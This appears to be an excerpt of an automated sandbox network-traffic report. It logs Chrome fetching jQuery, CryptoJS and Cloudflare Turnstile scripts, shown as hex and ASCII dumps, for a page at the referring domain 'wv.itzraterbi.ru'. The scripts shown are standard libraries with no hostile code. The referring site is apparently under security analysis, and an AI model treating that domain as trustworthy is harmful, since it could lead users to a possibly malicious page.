                                                                                                                          2024-12-19 16:09:06 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                          2024-12-19 16:09:06 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                          2024-12-19 16:09:06 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                          2024-12-19 16:09:06 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.1649785104.18.94.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:05 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:06 UTC386INHTTP/1.1 302 Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:06 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7b49feb42fd-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.1649786104.17.25.144437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:05 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:06 UTC959INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:06 GMT
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                          ETag: W/"61182885-40eb"
                                                                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 80401
                                                                                                                          Expires: Tue, 09 Dec 2025 16:09:06 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmbpam5NVbPgR62OGskmDnSYJ%2FjM%2BW1FyVRpdHCHOgHwCEp%2B5O6oiCSSG09yhGGn9Y0n9sKR%2FHrhwWLavrow6d1AVttKi7nIqmUIxxB0w8f3vupZnvR1E7jvVqDPDw8S4zoEYd9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7b499831a07-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:06 UTC410INData Raw: 37 62 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                          Data Ascii: 7bea!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                                                                          Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                                                                          Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                                                                          Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                                                                          Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                                                                          Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                                                                          Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                                                                          Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                                                                          Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                                                                          2024-12-19 16:09:06 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                                                          Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.1649787104.18.94.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:07 UTC647OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:07 UTC471INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:07 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 47692
                                                                                                                          Connection: close
                                                                                                                          accept-ranges: bytes
                                                                                                                          last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                          access-control-allow-origin: *
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7bf3ede1a1b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
